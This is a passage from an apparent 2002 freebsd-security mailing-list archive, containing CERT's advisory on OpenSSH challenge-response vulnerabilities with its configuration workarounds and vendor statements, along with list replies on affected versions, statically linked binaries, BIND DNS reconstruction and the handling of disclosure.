mostly works with IRIX, but it uses a flag to mmap that isn't in IRIX (MAP_ANON) for compression so you can't have both on at the same time. IRIX doesn't ship with PAM so a lot of the PAM issues aren't issues for us. _________________________________________________________________ The CERT/CC thanks Theo de Raadt and Markus Friedl of the OpenSSH project for their technical assistance in producing this advisory. _________________________________________________________________ Author: Cory F. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 26, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPRpGQ6CVPMXQI2HJAQEC1QP/eqRQzNmK0B1h5DvNLtTFmey8wOpfrSpX PHbJ2Ps4IYfu+OepUH7UEDGoYkza5jpIoqz+UeRmJfq51IU2RCwcfOOEkbLslra7 yFEM9oWIVCwC6cOvlkzlXA6cd2uX6YonNxYZ/6tUs3BmQVKxCrzDXBEWV6HC3zis 1qgt5S8MRYM= =+K4J -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19:31: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from energistic.com (bdsl.66.12.217.106.gte.net [66.12.217.106]) by hub.freebsd.org (Postfix) with ESMTP id 1C9E437B400 for ; Wed, 26 Jun 2002 19:29:51 -0700 (PDT) Received: from energistic.com (steve@localhost [127.0.0.1]) by energistic.com (8.12.4/8.12.3) with ESMTP id g5R2ToeU058058; Wed, 26 Jun 2002 21:29:50 -0500 (EST) (envelope-from steve@energistic.com) Received: (from steve@localhost) by energistic.com (8.12.5/8.12.4/Submit) id g5R2Tn3g056389; Wed, 26 Jun 2002 21:29:49 -0500 (EST) Date: Wed, 26 Jun 2002 21:29:49 -0500 From: Steve Ames To: D J Hawkey Jr Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) Message-ID: <20020627022949.GA55324@energistic.com> References: <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626210055.A2065@sheol.localdomain> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 09:00:55PM -0500, D J Hawkey Jr wrote: > On Jun 27, at 03:49 AM, Dag-Erling Smorgrav wrote: > > > > hawkeyd@visi.com (D J Hawkey Jr) writes: > > > Sorry to be so thick-headed, but between Mike and Jacques, the answer > > > to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" > > > is "That does appear to be the case.". > > > > 2.9 is not vulnerable to this particular attack. > > That's as simple as it gets. Thanks. That "particular attack"... yep. The CERT advisory seemed to indicate that earlier versions also have vulnerabilities? From 2.3.1p1 to 3.3... -Steve CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Handling Original release date: June 26, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * OpenSSH versions 2.3.1p1 through 3.3 Overview There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and that use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting. Additionally, a number of other possible security problems have been corrected in OpenSSH version 3.4. I. Description Two related vulnerabilities have been found in the handling of challenge responses in OpenSSH. The first vulnerability is an integer overflow in the handling of the number of responses received during challenge response authentication. If the challenge response configuration option is set to yes and the system is using SKEY or BSD_AUTH authentication then a remote intruder may be able to exploit the vulnerability to execute arbitrary code. This vulnerability is present in versions of OpenSSH 2.9.9 through 3.3. An exploit for this vulnerability is reported to exist. This vulnerability is partially described in a recent ISS security advisory available at http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 The second vulnerability is a buffer overflow involving the number of responses received during challenge response authentication. Regardless of the setting of the challenge response configuration option, systems using PAM modules that use interactive keyboard authentication (PAMAuthenticationViaKbdInt), may be vulnerable to the remote execution of code. At this time, it is not known if this vulnerability is exploitable. Both vulnerabilities are corrected by the patches in a recent OpenSSH security advisory available from http://www.openssh.com/txt/preauth.adv Both vulnerabilities exploit features present only in version 2 of the SSH protocol. Vulnerability Note VU#369347 lists the vendors we contacted about this vulnerability. The vulnerability note is available from http://www.kb.cert.org/vuls/id/369347 II. Impact A remote attacker can execute code with the privileges of the user running the sshd (often root). These vulnerabilities may also be used to cause a denial-of-service condition. III. Solution Upgrade to OpenSSH version 3.4 These vulnerabilities are eliminated by upgrading to OpenSSH version 3.4, which is available from the OpenSSH web site at http://www.openssh.com OpenSSH version 3.4 will correct several other software defects with potential security implications not described in this advisory. Apply a patch from your vendor A patch for this problem is included in the OpenSSH advisory at http://www.openssh.com/txt/preauth.adv This patch may be manually installed with minor changes to correct these vulnerabilities in all affected versions of OpenSSH. Please note that applying the patches described in the OpenSSH advisory does not correct the other software defects with potential security implications not described in this advisory. If your vendor has provided a patch to correct these vulnerabilities, you may want to apply their patch rather than upgrading your version of sshd. System administrators may want to confirm whether their vendor's patch includes the other possible vulnerabilities corrected in OpenSSH 3.4. More information about vendor-specific patches can be found in the vendor section of this document. Because the publication of this advisory was unexpectedly accelerated, statements from all of the affected vendors were not available at publication time. We will update this document as vendors provide additional information. Disable SSH protocol version 2 Since both vulnerabilities are present only in protocol version 2 features, disabling version 2 of the protocol will prevent both vulnerabilities from being exploited. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: Protocol 1 This option may set to "2,1" by default. System administrators should be aware that disabling protocol version 2 may prevent the sshd daemon from accepting connections in certain configurations. Applying one or both of the configuration changes described below may be a less disruptive workaround for this problem. Disable challenge response authentication For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code by setting the "ChallengeResponseAuthentication" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: ChallengeResponseAuthentication no This option may be enabled (set to "yes") by default. This workaround should prevent the first vulnerability from being exploited if SKEY or BSD_AUTH authentication is used. It will not prevent the possible exploitation of the vulnerability via PAM interactive keyboard authentication. Disable PAM authentication via interactive keyboard For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code affecting the PAM authentication issue by setting the "PAMAuthenticationViaKbdInt" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: PAMAuthenticationViaKbdInt no This option may be disabled (set to "no") by default. This workaround should prevent the second vulnerability from being exploited if PAM interactive keyboard authentication is used. It will not prevent the possible exploitation of the vulnerability via SKEY or BSD_AUTH authentication. Disable both options in older versions of OpenSSH For OpenSSH versions between 2.3.1p1 and 2.9, system adminstrators will instead need to set the following options in their ssh configuration file: KbdInteractiveAuthentication no ChallengeResponseAuthentication no Setting both of these options is believed to prevent the exploitation of the vulnerabilities regardless of which authentication mechanisms are used. Use privilege separation to minimize impact System administrators running OpenSSH versions 3.2 or 3.3 may be able to reduce the impact of this vulnerability by enabling the "UsePrivilegeSeparation" configuration option in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: UsePrivilegeSeparation yes This workaround does not prevent these vulnerabilities from being exploited, however due to the privilege separation mechanism, the intruder may be limited to a constrained chroot environment with restricted privileges. This workaround will not prevent these vulnerabilities from creating a denial-of-service condition. Not all operating system vendors have implemented the privilege separation code, and on some operating systems, it may limit the functionality of OpenSSH. System administrators are encouraged to carefully review the implications of using the workaround in their environment, and use a more comprehensive solution if one is available. The use of privilege separation to limit the impact of future vulnerabilities is encouraged. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services. Software Security Response Team x-ref:SSRT2263 At the time of writing this document, Compaq is currently investigating the potential impact to HP Tru64 UNIX, commercial version of SSH for V5.1a. As further information becomes available notice will be provided of the completion/availability of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel. Caldera Caldera OpenLinux OpenSSH has neither the S/KEY nor BSD Auth features compiled in, so it is not vulnerable to the Challenge/Response vulnerability. We do have the ChallengeResponseAuthentication option on by default, however, so to be safe, we recommend that the option be disabled in the sshd_config file. In addition, the sshd_config PAMAuthenticationViaKbdInt option is off by default, so OpenLinux is not vulnerable to the other alleged vulnerability in a default configuration, either. However, Caldera recommends that this option be disabled if it has been enabled by the system administrator. Cray, Inc. Cray, Inc. has found the OpenSSH released in Cray Open Software 3.0 to be vulnerable. Please see Field Notice 5105 and spr 722588 for fix information. Debian Debian 2.2 (the current stable release) is not affected by these problems. The current versions of our "testing" distribution, to become Debian 3.0, and our "unstable" distribution, are both affected by default. We recommend that users be certain that both: ChallengeResponseAuthentication no and PAMAuthenticationViaKbdInt no are present and uncommented in /etc/ssh/sshd_config (and that the server is restarted). Also, we recommend the use of version 3.3p1, now available from security.debian.org (DSA-134). Stable users do not need to upgrade and may wish to wait until the packages have received better testing. We intend to provide 3.4p1 packages in the near future. Engarde Guardian Digital ships OpenSSH in all versions of EnGarde Secure Linux. Version 3.3p1 was introduced by ESA-20020625-015 on June 25, 2002. This update introduces privilege separation. All users are strongly urged to upgrade to this version as soon as possible. An upgrade to version 3.4p1 (which properly fixes the bugs) will be made available sometime in the next few days. Hewlett-Packard Company Hewlett-Packard provides a version of SSH: HP-UX Secure Shell (T1471AA) for HP-UX versions 11.00 and 11i. We are investigating to determine whether this product is vulnerable. IBM Corporation IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here as is the version of OpenSSH available for downloading from the IBM Linux Affinity website. Anyone running this version is advised to follow the recommendations above to limit their vulnerability. We working with the changes for version 3.4 and will have a new package availble for download as soon as possible. When available the new packages can be downloaded from: http://www6.software.ibm.com/dl/aixtbx/aixtbx-p This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first. Lotus Lotus products are not vulnerable to this problem. Mandrake Software MandrakeSoft released OpenSSH 3.3p1 in updates Monday night to mitigate this vulnerability. Updates to OpenSSH 3.4p1 will be available for download later this week. Microsoft Corporation Microsoft products are not affected by the issues detailed in this advisory. Network Appliance NetApp systems are not vulnerable to this problem. OpenBSD See http://www.openbsd.org/errata.html#sshd OpenSSH See http://www.openssh.com/txt/preauth.adv Process Software MultiNet, TCPware, and SSH for OpenVMS are not affected by the problems outlined in this advisory. RedHat Inc. Red Hat Linux versions 7, 7.1, 7.2 and 7.3 as well as Red Hat Linux Advanced Server version 2.1 ship with OpenSSH. The Red Hat Linux OpenSSH packages were not compiled with either BSD_AUTH or SKEY enabled, therefore in order to be vulnerable to this issue a user would need to have enabled the configuration option "PAMAuthenticationViaKbdInt" in their sshd configuration file (the default is disabled). We are continuing to investigate this vulnerability and will release updated packages where appropriate. SGI At this time, SGI does not ship OpenSSH as a part of IRIX. The OpenSSH privilege separation code mostly works with IRIX, but it uses a flag to mmap that isn't in IRIX (MAP_ANON) for compression so you can't have both on at the same time. IRIX doesn't ship with PAM so a lot of the PAM issues aren't issues for us. _________________________________________________________________ The CERT/CC thanks Theo de Raadt and Markus Friedl of the OpenSSH project for their technical assistance in producing this advisory. _________________________________________________________________ Author: Cory F. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 26, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPRpGQ6CVPMXQI2HJAQEC1QP/eqRQzNmK0B1h5DvNLtTFmey8wOpfrSpX PHbJ2Ps4IYfu+OepUH7UEDGoYkza5jpIoqz+UeRmJfq51IU2RCwcfOOEkbLslra7 yFEM9oWIVCwC6cOvlkzlXA6cd2uX6YonNxYZ/6tUs3BmQVKxCrzDXBEWV6HC3zis 1qgt5S8MRYM= =+K4J -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19:50: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by hub.freebsd.org (Postfix) with ESMTP id 84FFE37B401 for ; Wed, 26 Jun 2002 19:49:58 -0700 (PDT) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id AF45A4A8F; Wed, 26 Jun 2002 21:49:57 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g5R2nvr02222; Wed, 26 Jun 2002 21:49:57 -0500 (CDT) (envelope-from hawkeyd) Date: Wed, 26 Jun 2002 21:49:57 -0500 From: D J Hawkey Jr To: Steve Ames Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) Message-ID: <20020626214957.A2165@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> <20020627022949.GA55324@energistic.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020627022949.GA55324@energistic.com>; from steve@energistic.com on Wed, Jun 26, 2002 at 09:29:49PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Jun 26, at 09:29 PM, Steve Ames wrote: > > On Wed, Jun 26, 2002 at 09:00:55PM -0500, D J Hawkey Jr wrote: > > On Jun 27, at 03:49 AM, Dag-Erling Smorgrav wrote: > > > > > > hawkeyd@visi.com (D J Hawkey Jr) writes: > > > > Sorry to be so thick-headed, but between Mike and Jacques, the answer > > > > to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" > > > > is "That does appear to be the case.". > > > > > > 2.9 is not vulnerable to this particular attack. > > > > That's as simple as it gets. Thanks. > > That "particular attack"... yep. The CERT advisory seemed to indicate > that earlier versions also have vulnerabilities? From 2.3.1p1 to 3.3... See below for some observations. For brevity's sake, I've snipped irrelevant text. > -Steve > > > CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response > Handling > > [SNIP] > > III. Solution > > [SNIP] > > Disable challenge response authentication > > For OpenSSH versions greater than 2.9, system administrators can > disable the vulnerable portion of the code by setting the > "ChallengeResponseAuthentication" configuration option to "no" in > their sshd configuration file. Typically, this is accomplished by > adding the following line to /etc/ssh/sshd_config: > > ChallengeResponseAuthentication no This I did when I enabled SSH. Seems a mis-match on this between clients and servers can go a little weird. > Disable PAM authentication via interactive keyboard > > For OpenSSH versions greater than 2.9, system administrators can > disable the vulnerable portion of the code affecting the PAM > authentication issue by setting the "PAMAuthenticationViaKbdInt" > configuration option to "no" in their sshd configuration file. > Typically, this is accomplished by adding the following line to > /etc/ssh/sshd_config: > > PAMAuthenticationViaKbdInt no No such animal with the OpenSSH version in RELENG_4_5. > Disable both options in older versions of OpenSSH > > For OpenSSH versions between 2.3.1p1 and 2.9, system adminstrators > will instead need to set the following options in their ssh > configuration file: > > KbdInteractiveAuthentication no > ChallengeResponseAuthentication no The first doesn't exist in the the OpenSSH version in RELENG_4_5. Would I be naive - or stupid - in assuming that those features that aren't even implemented cannot be vulnerable? Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 20: 9:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns1.pu.net (ns1.pu.net [216.87.139.234]) by hub.freebsd.org (Postfix) with ESMTP id C7B1437B418 for ; Wed, 26 Jun 2002 20:06:24 -0700 (PDT) Received: (from bugs@localhost) by ns1.pu.net (8.12.4/8.11.6) id g5R36FYK000640 for freebsd-security@freebsd.org; Wed, 26 Jun 2002 22:06:15 -0500 (CDT) (envelope-from bugs) From: Mark Hittinger Message-Id: <200206270306.g5R36FYK000640@ns1.pu.net> Subject: re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) To: freebsd-security@freebsd.org Date: Wed, 26 Jun 2002 22:06:15 -0500 (CDT) X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Roger Marquis wrote: > The track record of Unix and non-Unix operating > systems which no longer ship with statically linked binaries is > evidence they are no longer necessary. But it sure is handy to have some staticly linked binaries laying around in case you ruin your own /usr/lib. It has been known to happen! I keep statics of chflags, ed, fsck, fsdb, ls, mount, sh, tar, and umount in /ohno so that I can dig myself out. This is particularly important when trying to keep up with -current. For awhile there it was happening at least once every two weeks. Maybe -stable could go 100% dynamic but a few of us would go out of our way to keep some important tools staticly linked. Later Mark Hittinger bugs@pu.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 20:20:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 2A81E37B400 for ; Wed, 26 Jun 2002 20:16:15 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BE36523; Wed, 26 Jun 2002 22:16:14 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5R3GEsE046836; Wed, 26 Jun 2002 22:16:14 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5R3GE6v046835; Wed, 26 Jun 2002 22:16:14 -0500 (CDT) Date: Wed, 26 Jun 2002 22:16:14 -0500 From: "Jacques A. Vidrine" To: Mark.Andrews@isc.org Cc: security@FreeBSD.ORG Subject: BIND and reconstruction of DNS messages (was Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv) Message-ID: <20020627031614.GE46205@madman.nectar.cc> References: <4.3.2.7.2.20020626133115.022a0d30@localhost> <200206270012.g5R0C8m0029482@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206270012.g5R0C8m0029482@drugs.dv.isc.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 10:12:08AM +1000, Mark.Andrews@isc.org wrote: > Provided you are behind a nameserver you trust that reconstructs > the answer you should be fine. Thanks for this info, Mark. I guess that name server better be running on localhost, or else an agent may be able to spoof DNS messages. > BIND 9 reconstucts all answers (excluding forwarded UPDATES). cool > BIND 8 forwards some and reconstructs others. at random? :-) Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 20:39:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from pcp01360967pcs.jamisn01.pa.comcast.net (pcp01360967pcs.jamisn01.pa.comcast.net [68.80.217.72]) by hub.freebsd.org (Postfix) with ESMTP id 70B3C37B40A for ; Wed, 26 Jun 2002 20:35:50 -0700 (PDT) Received: from pcp01360967pcs.jamisn01.pa.comcast.net (k8vkz8l48o4srh39@localhost [127.0.0.1]) by pcp01360967pcs.jamisn01.pa.comcast.net (8.12.3/8.12.3) with ESMTP id g5R3ZveY018702; Wed, 26 Jun 2002 23:35:57 -0400 (EDT) (envelope-from kway@pcp01360967pcs.jamisn01.pa.comcast.net) Received: (from kway@localhost) by pcp01360967pcs.jamisn01.pa.comcast.net (8.12.4/8.12.4/Submit) id g5R3YfVl008506; Wed, 26 Jun 2002 23:34:41 -0400 (EDT) Date: Wed, 26 Jun 2002 23:34:41 -0400 From: Kevin Way To: Brian Behlendorf Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627033441.GA99268@overtone.org> References: <20020626152851.Q310-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 03:29:45PM -0700, Brian Behlendorf wrote: > Sorry for the newbie question here, but is there a way to programmatically > determine which binaries on a system static-linked libc? I tried "nm" but > that needs non-stripped executables... quick, dirty, evil, and maybe even effective? -Kevin Way #!/usr/local/bin/bash function dir_walk() { for test in $1/* do if [ $test = '.' -o $test = '..' ] then break elif [ -d $test ] then dir_walk $test else do_something $test fi done } function do_something() { if file $1 | grep 'statically linked' > /dev/null 2>&1 then echo "well shit, $1 is statically linked" fi } dir_walk / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 20:44:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 67CFE37B409; Wed, 26 Jun 2002 20:36:08 -0700 (PDT) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5R3Zlm0040680; Thu, 27 Jun 2002 13:35:47 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206270335.g5R3Zlm0040680@drugs.dv.isc.org> To: "Jacques A. Vidrine" Cc: security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: BIND and reconstruction of DNS messages (was Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv) In-reply-to: Your message of "Wed, 26 Jun 2002 22:16:14 EST." <20020627031614.GE46205@madman.nectar.cc> Date: Thu, 27 Jun 2002 13:35:47 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Thu, Jun 27, 2002 at 10:12:08AM +1000, Mark.Andrews@isc.org wrote: > > Provided you are behind a nameserver you trust that reconstructs > > the answer you should be fine. > > Thanks for this info, Mark. > > I guess that name server better be running on localhost, or else an > agent may be able to spoof DNS messages. > > > BIND 9 reconstucts all answers (excluding forwarded UPDATES). > > cool > > > BIND 8 forwards some and reconstructs others. > > at random? :-) No. See ns_resp.c for details. > Cheers, > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 21:11:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtpout.mac.com (smtpout.mac.com [204.179.120.85]) by hub.freebsd.org (Postfix) with ESMTP id 7AE8937B443 for ; Wed, 26 Jun 2002 21:07:07 -0700 (PDT) Received: from smtp-relay02.mac.com (smtp-relay02-en1 [10.13.10.225]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g5R476fd014706 for ; Wed, 26 Jun 2002 21:07:06 -0700 (PDT) Received: from asmtp01.mac.com (asmtp01-qfe3 [10.13.10.65]) by smtp-relay02.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g5R476rE022845 for ; Wed, 26 Jun 2002 21:07:06 -0700 (PDT) Received: from localhost ([202.45.118.100]) by asmtp01.mac.com (Netscape Messaging Server 4.15) with ESMTP id GYCJFT00.73E; Wed, 26 Jun 2002 21:07:05 -0700 Date: Thu, 27 Jun 2002 13:36:59 +0930 Subject: Re: Wow (or, How Theo should have handled it) Content-Type: text/plain; charset=ISO-8859-1; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: Wincent Colaiuta To: Theo de Raadt , freebsd-security@freebsd.org Content-Transfer-Encoding: quoted-printable In-Reply-To: <200206261919.g5QJJLLI018466@cvs.openbsd.org> Message-Id: <53E21546-8983-11D6-BE6B-003065C60B4C@mac.com> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org El Thursday, 27 June, 2002, a las 04:49 AM, Theo de Raadt escribi=F3: >> * Theo de Raadt (deraadt@cvs.openbsd.org) [020626 12:02]: >>> We also did 5600 lines of further security auditing work over the = last >>> week. We're fairly convinced that some of the things we changed are >>> relevant as well. ie. more holes. >>> >>> And that is commited in 3.4 >> >> Theo, >> >> When will we see an advisory and/or patches for older versions=20 >> regarding >> the other holes that you have uncovered? > > You won't. > > I've barely slept in a week. > > So many of you are being totally unreasonable people. Great. That's just what I want... a rushed 3.4 release which contains=20 5600 lines of code "audited" by a team of sleep-deprived zombies.=20 (joking... I do appreciate your efforts, Theo). Seriously, Theo, the best thing you could've done would have been to=20 fully disclose the original bug in the challenge/response code and the=20= one-line fix (turn off challenge/response auth), and told people two=20 things: firstly, that patches were being worked on; and secondly, that=20= 3.4 was on the way soon and that it would be desirable to upgrade to=20 that and activate priv separation so as to better cope with future=20 potential holes. Unfortunately, the way you DID handle it created a furore and upset an=20= awful lot of people who spent hours and hours undergoing a rushed and=20 complicated upgrade procedure on dozens or even hundreds of boxes, when=20= they probably would've preferred to apply the one-line workaround and=20 upgrade to 3.4 in a more reasonable time-frame (ie. an orderly, planned=20= upgrade; not an rushed, emergency one). To make matters worse 